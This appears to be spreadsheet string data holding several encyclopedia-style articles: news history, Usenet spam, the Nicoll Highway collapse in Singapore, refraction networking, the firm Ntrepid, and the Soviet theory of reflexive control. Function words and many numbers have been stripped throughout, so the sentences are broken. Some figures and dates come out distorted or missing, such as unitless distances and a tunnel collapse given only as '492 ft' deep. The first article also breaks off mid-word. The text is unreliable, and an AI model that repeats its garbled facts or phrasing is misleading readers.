    <t>news information current events. this provided many different media: word mouth, printing, postal systems, broadcasting, electronic communication, testimony observers witnesses events. news sometimes called "hard news" differentiate soft media. common topics news reports include war, government, politics, education, health, environment, economy, business, fashion, entertainment, sport, well quirky unusual events. government proclamations, concerning royal ceremonies, laws, taxes, public health, criminals, dubbed news since ancient times. technological social developments, often driven government communication espionage networks, increased speed news spread, well influenced content. genre news know today closely associated newspaper. meaning etymology english word "news" developed 14th century special plural form "new". middle english, equivalent word newes, like french nouvelles german neues. similar developments found slavic languages namely czech slovak noviny (from nový, "new"), cognate polish nowiny, bulgarian novini, russian novosti celtic languages: welsh newyddion (from newydd) cornish nowodhow (from nowydh).jessica garretson finch credited coining phrase "current events" teaching barnard college 1890s. newness name implies, "news" typically connotes presentation information. newness news gives uncertain quality distinguishes careful investigations history scholarly disciplines. whereas historians tend view events causally related manifestations underlying processes, news stories tend describe events isolation, exclude discussion relationships them. news conspicuously describes world present immediate past, even important aspects news story occurred long past—or expected occur future. make news, ongoing process must "peg", event time anchors present moment. relatedly, news often addresses aspects reality seem unusual, deviant, ordinary. hence famous dictum "dog bites man" news, "man bites dog" is.another corollary newness news that, technology enables media disseminate news quickly, 'slower' forms communication move away 'news' towards 'analysis'. commodity according theories, "news" whatever news industry sells. journalism, broadly understood along lines, occupation collecting providing news. from commercial perspective, news simply input, along paper electronic server) necessary prepare final product distribution. news agency supplies resource "wholesale" publishers enhance retail. tone most purveyors news value impartiality, neutrality, objectivity, despite inherent difficulty reporting without political bias. perception values changed greatly time sensationalized 'tabloid journalism' risen popularity. michael schudson argued world concomitant rise propaganda, journalists aware concept bias reporting, alone actively correcting news also sometimes said portray truth, relationship elusive qualified.paradoxically, another property commonly attributed news sensationalism, disproportionate focus exaggeration emotive stories public consumption. this news also unrelated gossip, human practice sharing information humans mutual interest. common sensational topic violence; hence another news dictum, bleeds, leads". newsworthiness newsworthiness defined subject sufficient relevance public special audience warrant press attention coverage.news values seem common across cultures. people seem interested news extent impact, describes conflicts, happens nearby, involves well-known people, deviates norms everyday happenings. common news topic, partly involves unknown events could pose personal danger. history folk news evidence suggests cultures around world found place people share stories interesting information. among zulus, mongolians, polynesians, american southerners, anthropologists documented practice questioning travelers news matter priority. sufficiently important news would repeated quickly often, could spread word mouth large geographic area. even printing presses came europe, news general public often travelled orally monks, travelers, town criers, etc.the news also transmitted public gathering places, greek forum roman baths. starting england, coffeehouses served important sites spread news, even telecommunications became widely available. history coffee houses traced arab countries, introduced england 16th century. muslim world, people gathered exchanged news mosques social places. travelers pilgrimages mecca traditionally stay caravanserais, roadside inns, along way, places naturally served hubs gaining news world. late medieval britain, reports ("tidings") major events topic great public interest, chronicled chaucer's 1380 house fame works. government proclamations before invention newspapers early 17th century, official government bulletins edicts circulated times centralized empires. first documented organized courier service diffusion written documents egypt, pharaohs used couriers diffusion decrees territory state (2400 bc). julius caesar regularly publicized heroic deeds gaul, upon becoming dictator rome began publishing government announcements called acta diurna. these carved metal stone posted public places. medieval england, parliamentary declarations delivered sheriffs public display reading market.specially sanctioned messengers recognized vietnamese culture, among khasi people india, winnebago cultures american midwest. zulu kingdom used runners quickly disseminate news. west africa, news spread griots. cases, official spreaders news closely aligned holders political power.town criers common means conveying information citydwellers. thirteenth-century florence, criers known banditori arrived market regularly, announce political news, convoke public meetings, call populace arms. 1307 1322–1325, laws established governing appointment, conduct, salary. these laws stipulated many times banditoro repeat proclamation (forty) city read them. different declarations sometimes came additional protocols; announcements regarding plague also read city gates. these proclamations used standard format, beginning exordium—"the worshipful esteemed gentlemen eight ward security city florence make known, notify, expressly command, whosoever, whatever status, rank, quality condition"—and continuing statement (narratio), request made upon listeners (petitio), penalty exacted would comply (peroratio). addition major declarations, bandi (announcements) might concern petty crimes, requests information, notices missing slaves. niccolò machiavelli captured medicis 1513, following bando calling immediate surrender. some town criers could paid include advertising along news.under ottoman empire, official messages regularly distributed mosques, traveling holy men, secular criers. these criers sent read official announcements marketplaces, highways, well-traveled places, sometimes issuing commands penalties disobedience. early news networks spread news always linked communications networks place disseminate thus, political, religious, commercial interests historically controlled, expanded, monitored communications channels news could spread. postal services long closely entwined maintenance political power large area.one imperial communication channels, called "royal road" traversed assyrian empire served source power. roman empire maintained vast network roads, known cursus publicus, similar purposes.visible chains long-distance signaling, known optical telegraphy, also used throughout history convey limited types information. these ranged smoke fire signals advanced systems using semaphore codes telescopes. latter form optical telegraph came japan, britain, france, germany 1790s 1850s. asia world's first written news originated eighth century china, reports gathered officials eventually compiled spring autumn annals. annals, whose compilation attributed confucius, available sizeable reading public dealt common news themes—though straddle line news history. dynasty credited developing effective imperial surveillance communications networks ancient world. government-produced news sheets, called tipao, circulated among court officials late dynasty (second third centuries ad). between 734, kaiyuan ("bulletin court") chinese tang dynasty published government news; handwritten silk read government officials. court created bureau official reports (jin zhouyuan) centralize news distribution court. newsletters called ch'ao continued produced gained wider public circulation following centuries. 1582 first reference privately published newssheets beijing, late ming dynasty.japan effective communications postal delivery networks several points history, first taika reform kamakura period 1183 1333. system depended hikyaku, runners, regularly spaced relay stations. method, news could travel kyoto kamakura days. special horse-mounted messengers could move information speed kilometers day. japanese shogunates less tolerant chinese government news circulation. postal system established period even effective, average speeds 125–150 km/day express speed km/day. this system initially used government, taking private communications exorbitant prices. private services emerged 1668 established nakama (guild). they became even faster, created effective optical telegraphy system using flags lanterns mirrors night. europe europe, middle ages, elites relied runners transmit news long distances. kilometres day, runner would take months bring message across hanseatic league bruges riga. early modern period, increased cross-border interaction created rising need information concise handwritten newssheets. driving force development commercial advantage provided up-to-date news.in 1556, government venice first published monthly notizie scritte, cost gazetta. these avvisi handwritten newsletters used convey political, military, economic news quickly efficiently italian cities (1500–1700)—sharing characteristics newspapers though usually considered true newspapers. avvisi sold subscription auspices military, religious, banking authorities. sponsorship flavored contents series, circulated many different names. subscribers included clerics, diplomatic staff, noble families. last quarter seventeenth century, long passages avvisi finding published monthlies mercure france and, northern italy, pallade veneta. postal services enabled merchants monarchs stay abreast important information. holy roman empire, emperor maximillian 1490 authorized brothers italian tasso family, francesco janetto, create network courier stations linked riders. they began communications line innsbruck mechelen grew there. 1505 network expanded spain, governed maximilian's philip. these riders could travel kilometers day. this system became imperial reichspost, administered tasso descendants (subsequently known thurn-und-taxis), 1587 received exclusive operating rights emperor. french postal service english postal service also began time, become comprehensive early 1600s. 1620, english system linked thurn-und-taxis.these connections underpinned extensive system news circulation, handwritten items bearing dates places origin. centred germany, network took news russia, balkans, italy, britain, france, netherlands. german lawyer christoph scheurl fugger house augsburg prominent hubs network. letters describing historically significant events could gain wide circulation news reports. indeed, personal correspondence sometimes acted convenient channel news could flow across larger network. common type business communication simple listing current prices, circulation quickened flow international trade. businesspeople also wanted know events related shipping, affairs businesses, political developments. even advent international newspapers, business owners still valued correspondence highly source reliable news would affect enterprise. handwritten newsletters, could produced quickly limited clientele, also continued 1600s. rise newspaper spread paper printing press china europe preceded major advance transmission news. with spread printing presses creation markets 1500s, news underwent shift factual precise economic reporting, emotive freewheeling format. (private newsletters containing important intelligence therefore remained people needed know.) first newspapers emerged germany early 1600s. relation aller fürnemmen gedenckwürdigen historien, 1605, recognized world's first formalized 'newspaper'; 'newspaper' modern sense, ancient roman acta diurna served similar purpose circa format, mashed together numerous unrelated perhaps dubious reports far-flung locations, created radically jarring experience readers. variety styles emerged, single-story tales, compilations, overviews, personal impersonal types news analysis.news public consumption first tightly controlled governments. 1530, england created licensing system press banned "seditious opinions". under licensing act, publication restricted approved presses—as exemplified london gazette, prominently bore words: "published authority". parliament allowed licensing lapse 1695, beginning marked whig tory newspapers. (during era, stamp limited newspaper distribution simply making expensive sell buy.) france, censorship even constant. consequently, many europeans read newspapers originating beyond national borders—especially dutch republic, publishers could evade state censorship.the united states newspaper boom beginning revolutionary era, accelerated spirited debates establishment government, spurred subsidies contained 1792 postal service act, continuing 1800s. american newspapers many stories copying reports other. thus offering free postage newspapers wishing exchange copies, postal service subsidized rapidly growing news network different stories could percolate. newspapers thrived colonization west, fueled high literacy newspaper-loving culture. 1880, francisco rivaled york number different newspapers printed newspaper copies capita. boosters towns felt newspapers covering local events brought legitimacy, recognition, community. 1830s american, wrote alexis tocqueville, civilized prepared time face life forest, plunging wilderness world bible, newspapers." france, revolution brought forth abundance newspapers climate press freedom, followed return repression napoleon. 1792 revolutionaries news ministry called bureau d'esprit.some newspapers published 1800s retained commercial orientation characteristic private newsletters renaissance. economically oriented newspapers published types data enabled advent statistics, especially economic statistics could inform sophisticated investment decisions. these newspapers, too, became available larger sections society, elites, keen investing savings stock markets. yet, case newspapers, incorporation advertising newspaper justified reservations accepting newspaper information face value. economic newspapers also became promoters economic ideologies, keynesianism mid-1900s.newspapers came sub-saharan africa colonization. first english-language newspaper area royal gazette sierra leone advertiser, established 1801, followed royal gold coast gazette commercial intelligencer 1822 liberia herald 1826. number nineteenth-century african newspapers established missionaries. these newspapers large promoted colonial governments served interests european settlers relaying news europe. first newspaper published native african language muigwithania, published kikuyu kenyan central association. muigwithania newspapers published indigenous africans took strong opposition stances, agitating strongly african independence. newspapers censored heavily colonial period—as well formal independence. some liberalization diversification took place 1990s.newspapers slow spread arab world, stronger tradition oral communication, mistrust european approach news reporting. eighteenth century, ottoman empire's leaders istanbul monitored european press, contents disseminated mass consumption. some first written news modern north africa arose egypt muhammad ali, developed local paper industry initiated limited circulation news bulletins called jurnals. beginning 1850s 1860s, private press began develop multi-religious country lebanon. newswire development electrical telegraph, often travelled along railroad lines, enabled news travel faster, longer distances. (days morse's baltimore–washington line transmitted famous question, "what hath wrought?", transmitted news henry clay theodore frelinghuysen chosen whig nominating party.) telegraph networks enabled centralization news, hands wire services concentrated major cities. modern form originated charles-louis havas, founded bureau havas (later agence france-presse) paris. havas began 1832, using french government's optical telegraph network. 1840 began using pigeons communications paris, london, brussels. havas began electric telegraph became available.one havas's proteges, bernhard wolff, founded wolffs telegraphisches bureau berlin 1849. another havas disciple, paul reuter, began collecting news germany france 1849, 1851 immigrated london, established reuters news agency—specializing news continent. 1863, william saunders edward spender formed central press agency, later called press association, handle domestic news. just insulated telegraph line crossed english channel 1851, reuter right transmit stock exchange prices paris london. maneuvered reuters dominant global position motto "follow cable", setting news outposts across british empire alexandria (1865), bombay (1866), melbourne (1874), sydney (1874), cape town (1876). united states, associated press became news powerhouse, gaining lead position exclusive arrangement western union company.the telegraph ushered global communications regime, accompanied restructuring national postal systems, closely followed advent telephone lines. with value international news premium, governments, businesses, news agencies moved aggressively reduce transmission times. 1865, reuters scoop lincoln assassination, reporting news england twelve days event took place. 1866, undersea telegraph cable successfully connected ireland newfoundland (and thus western union network) cutting trans-atlantic transmission time days hours. transatlantic cable allowed fast exchange information london york stock exchanges, well york, chicago, liverpool commodity exchanges—for price $5–10, gold, word. transmitting 1857, young british telegraph operator delhi signaled home alert authorities indian rebellion 1857. rebels proceeded disrupt british telegraph network, rebuilt redundancies. 1902–1903, britain u.s. completed circumtelegraphy planet transpacific cables canada fiji zealand (british empire), hawaii occupied philippines. u.s. reassertions monroe doctrine notwithstanding, latin america battleground competing telegraphic interests world u.s. interests finally consolidate power hemisphere. turn century (i.e., circa 1900), wolff, havas, reuters formed news cartel, dividing global market three sections, more-or-less exclusive distribution rights relationships national agencies. each agency's area corresponded roughly colonial sphere mother country. reuters australian national news service agreement exchange news other. high cost maintaining infrastructure, political goodwill, global reach, newcomers found virtually impossible challenge three european agencies american associated press. 1890 reuters partnership press association, england's major news agency domestic stories) expanded "soft" news stories public consumption, topics sports "human interest". 1904, three wire services opened relations vestnik, news agency czarist russia, group, though maintained reporters moscow. during russian revolution, outside agencies maintained working relationship petrograd telegraph agency, renamed russian telegraph agency (rosta) eventually telegraph agency soviet union (tass).the chinese communist party created news agency, china news agency, 1931; primary responsibilities china newspaper internal reference news. 1937, party renamed agency xinhua, china. xinhua became official news agency people's republic china 1949.these agencies touted ability distill events "minute globules news", 20–30 word summaries conveyed essence developments. unlike newspapers, contrary sentiments reporters, agencies sought keep reports simple factual. wire services brought forth "inverted pyramid" model news copy, facts appear start text, details included goes along. sparse telegraphic writing style spilled newspapers, often reprinted stories wire little embellishment. september 1918 pravda editorial, lenin instructed soviet press back political rambling produce many short anticapitalist news items "telegraph style".as previous eras, news agencies provided special services political business clients, services constituted significant portion operations income. wire services maintained close relationships respective national governments, provided press releases payments. acceleration centralization economic news facilitated regional economic integration economic globalization. decrease information costs increasing communication speed stood roots increased market integration, rather falling transport costs itself. order send goods another area, merchants needed know first whether fact send goods place. information costs speed essential decisions." radio television british broadcasting company began transmitting radio news london 1922, dependent entirely, law, british news agencies. radio marketed news social elites, hired broadcasters spoke upper-class accents. gained importance 1926 general strike, newspapers closed radio served source news uncertain public. displeasure many listeners, took unambiguously pro-government stance strikers).in rca's radio group established radio network, nbc, 1926. paley family founded soon after. these networks, supplied news broadcasts subsidiaries affiliates, dominated airwaves throughout period radio's hegemony news source. radio broadcasters united states negotiated similar arrangement press 1933, agreed news press–radio bureau eschew advertising; agreement soon collapsed radio stations began reporting news (with advertising). britain, american news radio avoided "controversial" topics norms established national association broadcasters. 1939, americans surveyed fortune considered radio news accurate newspapers, chose radio main news source. radio expanded rapidly across continent, stations 1920 thousand 1930s. this operation financed mostly advertising public relations money.the soviet union began major international broadcasting operation 1929, stations german, english french. nazi party made radio rise power germany, much propaganda focused attacking soviet bolsheviks. british italian foreign radio services competed influence north africa. four broadcast services grew increasingly vitriolic european nations prepared war.the provided opportunity expand radio take advantage potential. reported allied invasion normandy 8:00 a.m. morning took place, including clip german radio coverage event. listeners followed along developments throughout day. u.s. office information 1942 sent programming across south america, middle east, east asia. radio luxembourg, centrally located high-power station continent, seized germany, united states—which created fake news programs appearing though created germany. targeting american troops pacific, japanese government broadcast "zero hour" program, included news u.s. make soldiers homesick. war, britain largest radio network world, broadcasting internationally different languages. scope would eventually surpassed 1955) worldwide voice america programs, produced united states information agency.in britain united states, television news watching rose dramatically 1950s 1960s supplanted radio public's primary source news. u.s., television networks owned radio: cbs, nbc, spin-off called abc. edward murrow, first entered public reporter london, made leap television become iconic newsman (and later director united states information agency).ted turner's creation cable news network (cnn) 1980 inaugurated 24-hour satellite news broadcasting. 1991, introduced competitor, world service television. rupert murdoch's australian news corporation entered picture news channel news britain, star asia. combining apparatus embedded reporters, united states waged 1991–1992 gulf assistance nonstop media coverage. cnn's specialty crisis, network prepared shift total attention chosen. news transmitted intelsat communications satellites. cnn, said executive, would bring "town crier global village".in 1996, qatar-owned broadcaster jazeera emerged powerful alternative western media, capitalizing part anger arab muslim world regarding biased coverage gulf war. jazeera hired many news workers conveniently laid arabic television, closed april 1996. used arabsat broadcast. internet early internet, known arpanet, controlled u.s. department defense used mostly academics. became available wider public release netscape browser 1994. first, news websites mostly archives print publications. early online newspaper electronic telegraph, published daily telegraph. 1994 earthquake california first stories reported online real time. availability browsing made news sites accessible people. oklahoma city bombing april 1995, people flocked newsgroups chatrooms discuss situation share information. oklahoma city daily posted news site within hours. news sites capable hosting images, jose mercury news time magazine, posted photographs scene.quantitatively, internet massively expanded sheer volume news items available person. speed news flow individuals also reached plateau. this insurmountable flow news daunt people cause information overload. zbigniew brzezinski called period "technetronic era", "global reality increasingly absorbs individual, involves him, even occasionally overwhelms him."in cases government crackdowns revolutions, internet often become major communication channel news propagation; (relatively) simple shut newspaper, radio television station, mobile devices smartphones netbooks much harder detect confiscate. propagation internet-capable mobile devices also given rise citizen journalist, provide additional perspective unfolding events. news media today news travel different communication media. modern times, printed news phoned newsroom brought reporter, typed either transmitted wire services edited manually type along news stories specific edition. today, term "breaking news" become trite commercial broadcasting united states cable news services available hours live communications satellite technology bring current events consumers' homes event occurs. events used take hours days become common knowledge towns nations instantaneously consumers radio, television, mobile phone, internet. speed news transmission, course, still varies wildly basis lives. newspaper most large cities united states historically morning afternoon newspapers. with addition communications media, afternoon newspapers shut morning newspapers lost circulation. weekly newspapers somewhat increased. cities, newspapers established local market monopolies—i.e., single newspaper town. this process accelerated since 1980s, commensurate general trend consolidation media ownership. china, too, newspapers gained exclusive status, city-by-city, pooled large associations chengdu business news. these associations function like news agencies, challenging hegemony xinhua news provider.the world's three circulated newspapers publish japan. about one-third newspaper revenue comes sales; majority comes advertising. newspapers struggled maintain revenue given declining circulation free flow information internet; implemented paywalls websites.in u.s., many newspapers shifted operations online, publishing around clock rather daily order keep pace internet society. prognosticators suggested print newspapers vanish u.s. 5–20 years. many newspapers started track social media engagement trending news stories cover. television internationally distributed news channels include news, cnn, news, msnbc, news network, news. televisions densely concentrated united states (98% households), average american watches hours television programming day. parts world, kenya—especially rural areas without much electricity—televisions rare.the largest supplier international video news reuters subscribers countries, bureaus, reported audience billion people day. major video news service associated press television news. these major agencies agreements exchange video news abc, nbc, cbs, cnn, eurovision—itself sizeable video news exchange. international notable broadcaster times crisis. internet online journalism news reported internet. news delivered quickly method news well accessed easily. internet transformed understanding news. because internet allows communication instantaneous, also multi-directional, blurred boundaries legitimate news producer. common type internet journalism called blogging, service persistently written articles uploaded written individuals. millions people countries united states south korea taken blogging. many blogs rather small audiences; blogs read millions month. social media sites, especially twitter facebook, become important source breaking news information disseminating links news websites. twitter declared 2012: "it's like delivered newspaper whose headlines always find interesting—you discover news happening, learn topics important you, inside scoop real time." cell phone cameras normalized citizen photojournalism.michael schudson, professor columbia university graduate school journalism, said "[e]verything thought knew journalism needs rethought digital age." today work journalism done anywhere done well. requires reporter laptop. way, journalistic authority seems become individual- less institution-based. individual reporter always actual journalist? journalistic work done anywhere anyone? these questions refer core journalistic practice definition "news" itself. schudson given emphasis answer easily found; "the ground journalists walk upon shaking, experience work field outside studying dizzying".schudson identified following specific areas ecology news opinion changed: line reader writer blurred. distinction among tweet, blog post, facebook, newspaper story, magazine article, book blurred. line professionals amateurs blurred, variety "pro-am" relationships emerged. boundaries delineating for-profit, public, non-profit media blurred, cooperation across models financing developed. within commercial news organizations, line news room business office blurred. line media media blurred, practically beyond recognition.these alterations inevitably fundamental ramifications contemporary ecology news. "the boundaries journalism, years seemed relatively clear, permanent, become less distinct, blurring, potentially foundation progress even source risk, given rise journalistic principles practices", schudson puts indeed complex, seems future. online news also changed geographic reach individual news stories, diffusing readership city-by-city markets potentially global audience.the growth social media networks also created opportunities automated efficient news gathering journalists newsrooms. many newsrooms (broadcasters, newspapers, magazines, radio started perform news gathering social media platforms. social media creating changes consumer behaviour news consumption. according study research, large portion americans read news digital mobile devices. because internet "column inches" limitation print media, online news stories can, always, come bundled supplementary material. medium world wide also enables hyperlinking, allows readers navigate pages related they're reading.despite changes, studies concluded internet news coverage remains fairly homogenous dominated news agencies. journalists working online media identify significantly different criteria newsworthiness print journalists. news agencies news agencies services compile news disseminate bulk. because disseminate information wide variety clients, repackage material news public consumption, news agencies tend less controversial language reports. despite importance, news agencies well known general public. they keep profiles reporters usually bylines.the oldest news agency still operating agence france-presse (afp). founded 1835 parisian translator advertising agent, charles-louis havas agence havas. twentieth century, reuters outpaced news agencies profits, became largest companies europe. 2011, thomson reuters employed 55,000 people countries, posted annual revenue $12.9 billion.united press international gained prominence world news agency middle twentieth century, shrank 1980s sold prices. owned unification church company news world communications. news agencies, espe</t>
  </si>
  <si>
    <t>Newsgroup spam</t>
  </si>
  <si>
    <t>newsgroup spam type spam targets usenet newsgroups. spamming usenet newsgroups actually pre-dates e-mail spam. first widely recognized usenet spam (though famous) posted january 1994 clarence thomas sysadmin andrews university. entitled "global alert all: jesus coming soon", fundamentalist religious tract claiming "this world's history coming climax." newsgroup posting serdar argic also appeared early 1994, posting tens thousands messages various newsgroups, consisting identical copies political screed relating armenian genocide. first "commercial" usenet spam, often (mistakenly) claimed first usenet spam sort, advertisement legal services entitled "green card lottery final one?". posted april 1994, arizona lawyers laurence canter martha siegel, hawked legal representation united states immigrants seeking green cards. usenet convention defines spamming "excessive multiple posting", repeated posting message substantially similar messages). during early 1990s substantial controversy among usenet system administrators (news admins) cancel messages control spam. "cancel message" directive news servers delete posting, causing inaccessible. some regarded precedent, leaning towards censorship, others considered proper available tools control growing spam problem. culture neutrality towards content precluded defining spam basis advertisement commercial solicitations. word "spam" usually taken mean "excessive multiple posting (emp)", neologisms coined abuses "velveeta" (from processed cheese product name) "excessive cross-posting". subset spam deemed "cancellable spam", considered justified issue third-party cancel messages. late 1990s, spam became used means vandalising newsgroups, malicious users committing acts sporgery make targeted newsgroups unreadable without heavily filtering. prominent example occurred alt.religion.scientology. prevalent recent times mi-5 persecution spam, well known across many newsgroups. these rambling postings often appear clusters twenty messages varying subjects content, related mike corley's perceived surveillance mi5, british intelligence agency. these rambling messages used state originator mi5victim@mi5.gov.uk. lately (december 2007) spammer taken altering "from" address subject line attempt past newsgroup "kill" filters. this uk-based spammer readily admits mental illness several postings. also corley conspiracy. prevalence usenet spam development breidbart index objective measure message's "spamminess". spam-detection software usenet policed anti-spam volunteers, purge newsgroups spam sending cancels filtering servers. this active form policing meant usenet less attractive target spammers used industrial-scale spammers moved e-mail spam instead. google usenet news archive advent large usenet archive kept part google groups website, made usenet attractive spammers ever. goal case reach members newsgroup, also take advantage fact google gives higher pagerank websites referred messages, catalogued mirrored multiple languages google's top-level domain. critics suggested google ulterior motives "turning blind eye" problem since websites pointed google ads, potentially generate revenue spammer google. spam extremely unfair companies paying google spammer ad-click, prevalent current spam (2010) trying trick readers clicking referring images saying link hidden "due high content" link hidden image (google take "paypal form" give money.while newsreaders filter spam either server user level, google filter spam usenet news archive. google does, however, offer spam filtering groups decide abandon usenet form moderated google group, gives another reason google would turn blind spam archive usenet news. also cancelbot meow wars sporgery references</t>
  </si>
  <si>
    <t>Nicoll Highway collapse</t>
  </si>
  <si>
    <t>nicoll highway collapse construction accident occurred approximately 3:30 p.m. singapore time (utc+8:00) april 2004 kallang, singapore tunnel constructed trains collapsed. tunnel part construction underground circle line, near nicoll highway station. supporting structure deep excavation work failed, resulting 30-metre deep cave-in spread across lanes nicoll highway. collapse killed four people injured three. accident delayed construction date station. causes investigations probes collapse commenced immediately. eventually found apparent cause collapse retaining wall could handle stress holding tunnel, forcing give way. this occurred near nicoll highway station construction along circle line near merdeka bridge. consequences collapse accident left collapse zone wide, long, deep (492 ft). four workers killed, three injured. steel beams twisted, construction cranes swallowed substantial chunk main highway running tunnel also knocked out. rescue efforts called 23rd month chance survival point, well danger rescue teams. there also increasing need stabilize ground around accident site reduce risk collapses. lanes nicoll highway heavily damaged, rendering road unusable. highway re-opened december year reconstruction efforts. committee inquiry found main contractor nishimatsu construction company (ja:西松建設) officers well land transport authority officers responsible collapse. several officers subcontractors reprimanded issued warnings connection accident. result accident, stages circle line delayed. stage line, bartley marymount stations opened first 2009. partially built station structure abandoned, affected station shifted metres (330 away accident site. eventually, nicoll highway station started operations april 2010. victims vadivil nadesan, crane operatora malaysian indian descent, body first recovered. 44-year-old reportedly tried escape jumping crane incident occurred. found caught pick-up truck container.liu rong quan (chinese: 刘荣权), construction workerthe body 36-year-old chinese national jiangsu province found wedged wheel chassis 10-tonne (22,000 truck. started working site days incident. left behind wife daughter.john lock yong (chinese: 陈陆勇), land transport authority engineerthe third victim found, finish contract 2004 planned migrate australia zealand. left behind wife, grown-up daughter son.heng yeow pheow (chinese: 王耀标), foremanthe body 40-year-old singaporean never recovered. according survivor accounts, heng selflessly hurried workers safety, saving workers, trapped collapse occurred. heng left behind wife, young children, 70-year-old mother nine siblings.family victims compensated s$30,000 (us$17,749.08) nishimatsu unconditionally. additionally, heng's family received s$380,000 settlements three construction firms involved collapse, s$630,000 public donations. money public donations diverted trust fund, heng's member parliament, irene expenses children's upkeep could drawn 2019. criminal trials four faced criminal charges wake incident.the first trial seng yoong project director circle line also monitored excavation design work capacity "qualified person" site. faced charge breaching conditions building control act. arguments made readings instruments site indicated things going planned, warnings acted upon. november 2005, fined s$8,000 court. references external links class probes singapore highway collapse report nicoll highway collapse singapore civil defence force nicoll highway collapse singapore infopedia</t>
  </si>
  <si>
    <t>Refraction networking</t>
  </si>
  <si>
    <t>refraction networking, also known decoy routing, research anti-censorship approach would allow users circumvent censor without using individual proxy servers. instead, implements proxy functionality core partner networks, internet service providers, outside censored country. these networks would discreetly provide censorship circumvention "any connection passes networks." this prevents censors selectively blocking proxy servers makes censorship expensive, strategy similar collateral freedom.the approach independently invented teams university michigan, university illinois, raytheon technologies. there five existing protocols: telex, tapdance, cirripede, curveball, rebound. these teams working together develop deploy refraction networking support u.s. department state. also domain fronting references external links official website</t>
  </si>
  <si>
    <t>Ntrepid</t>
  </si>
  <si>
    <t>ntrepid american software, hardware, cyber security company, registered florida based herndon, virginia. history 2008, anonymizer company acquired abraxas corporation, purchased cubic 2010 $124 million. some abraxas' former employees left form ntrepid year. lance cottrell, founder anonymizer, chief scientist ntrepid. anonymizer wholly owned ntrepid. military contract march 2011, ntrepid $2.76 million contract u.s. military "online persona management." contract creation technology would allow blogging activities websites, exclusively outside united states, "counter violent extremist enemy propaganda." would allow operator anonymously create control personas computer.the project overseen u.s. central command (centcom), whose spokesman commander bill speaks stated operation would carried arabic, persian, urdu.the project thought connected operation earnest voice. references external links ntrepid official site</t>
  </si>
  <si>
    <t>Reflexive control</t>
  </si>
  <si>
    <t>reflexive control control someone opponent’s decisions imposing assumptions change act.methods reflexive control widely used variety fields: advertising, public relations, military art, etc. example strategy could card shark deliberately losing first games game, systematic diversionary attacks unimportant area combat, etc.. introduction defined soviet scholar lefebvre reflexive control process adversary hands basis decision-making.». words, substitution motivation factors enemy order encourage take disadvantageous decisions. professor smolyan believes point reflexive control implicitly forcing subject choose desired result. aphoristic example reflexive manipulation recall episode "uncle remus's tales" brother rabbit eludes brother asking: whatever throw briar patch oldest literary heroes specialized reflexive control considered biblical serpent provoked taste forbidden fruit. category typical provocateurs also include famous characters swedish writer astrid lindgren, terrorized housewife freken bock simple question: have stopped drinking cognac morning? individual techniques reflexive control called "stratagems" occupied important place history military since ancient times. example, title first chapter treatises statement "war deception," thus defining craft warfare deception.the preconditions actual emergence theory reflexive control found soviet military literature mid-20th century; four main stages distinguished process improvement: early 1960s late 1970s: research, late 1970s early 1990s: practice-oriented, beginning middle 1990s: psychological pedagogical, since late 1990s: psychosocial.among authoritative scientists dealt tasks reflexive control, addition lefebvre, works pospelov, burkov, lepsky, shchedrovitsky others noted. addition them, artistic aspects subject reflexive control reflected works major writers, example, pelevin. military application general provisions formally approved terminology reflexive control exist military past; nevertheless, tools intuitively recognized actively used attempts calculate actions adversary create erroneous impression him/herself.according russian military experts, applied aspects reflexive control, geopolitical significance, effective tool conducting information warfare significant advantages traditional methods using military means. exploiting moral stereotypes behavior, psychological factors, personal information command personnel (biographical data, habits, etc.) reflexive control makes possible increase chances achieving victory, noted tactic requires information enemy high degree detail quality.among tools reflexive control also listed camouflage levels), disinformation, provocation, blackmail, compromising, etc., whose vector action aimed hard grasp subjectively perceived elements "military art" objective concepts "military science". modern computerization make difficult reflexive control methods application easily revealed mathematical modeling. nevertheless, cannot dismiss existence broad class exceptions machine intelligence lack intuitive understanding real reality. reviewing russian research arsenal reflexive control military purposes, american scholar t.l. thomas singled work colonel s.a. komov productive military theorist area..in publications, komov made extensive developments field reflexive management name "intellectual methods information warfare," highlighting following main elements.: distraction real perceived threat enemy's positions flanks, rear, etc.) preparations military action, overloading supplying enemy large volumes self-contradictory information, paralysis, creating illusion pinpointed threats vital interests vulnerable locations, exhaustion, forcing adversary expend resources perform unproductive activities, deception, provoking enemy redeploy forces threatened area preparation military action, splitting, forcing enemy interests allies, appeasement, lowering vigilance creating illusion routine training, rather preparations offensive actions, taking place, intimidation, creating appearance invincible superiority, provocation, imposition unfavorable scenario action, suggestion, presentation information material influences legally, morally, ideologically spheres, pressure, presentation information material discredits government eyes population.another domestic researcher attracted interest abroad professor chausov, formulated following principles reflexive management: principle purposefulness process goal-oriented, involving full range necessary measures reflexive management, principle actualization "updating" planning, providing fairly complete picture intellectual potential command staff, especially situations related global information space, principle conformity mutual consistency goals, place, time methods reflexive management must observed, simulation principle forget forecasting modeling actions states opposing side execution reflexive control procedures, principle anticipation current events must anticipated anticipated.in addition, using reflexive management, chausov gave assessment risk, essence boils danger making mistake misjudge consequences. with approach, maximum risk would adversary unravels plan himself. well-known example effective theory reflexive control disinformation work soviet secret services create exaggerated impression american side shock potential soviet nuclear weapons. end, fake models intercontinental ballistic missiles developed participation square parades, appearance immediately reflected reports foreign attachés superiors. next stage provide indirect evidence real existence missile systems, would divert resources foreign developers unsuccessful attempts reproduce allegedly "new" technology.similarly, british intelligence conducted disinformation support allied landings sicily, codenamed operation mincemeat. purpose, dead british serviceman planted sight reich's special services skilfully fabricated documents describing alleged british landing operation peloponnese sardinia. judging plans, informational screen landing demonstrative preparations fake attack sicily. german leadership carried works strengthen greek coast, redeployed tank division, quite unexpectedly main blow struck sicily.domestic researchers believe another textbook example reflexive control american strategic defense initiative program, forced soviet union spend significant resources develop similar space system. according number foreign researchers, manipulative methods field reflexive control form basis russia's concept military action 21st century, west called "new generation warfare.». time, publications critical applied aspects theory, even called pseudoscientific. references bibliography thomas, timothy (2004). "russia's reflexive control theory military". journal slavic military studies. taylor francis. (2): 237–256. doi:10.1080/13518040490450529. issn 1351-8046. s2cid 15779122. денисов денисова краткий очерк основ теории управляемой конфронтации (рус.) информационные войны журнал. 2014. 24–33. issn 1996-4544. лепский технологии управления информационных войнах классики постнеклассике). москва: когито-центр, 2016. 160. isbn 978-5-89353-499-3. нургалеева проблема рефлексивного управления аспект современной коммуникативной культуры (рус.) вестник томского государственного университета журнал. 2013. раскин тарасов рефлексивное управление технология информационного воздействия (рус.) информационные войны журнал. 2014. 15–17. issn 1996-4544. чепиницкая технологии социальной регуляции рефлексивном управлении российской зарубежной диаспорой (рус.) теория практика общественного развития журнал. 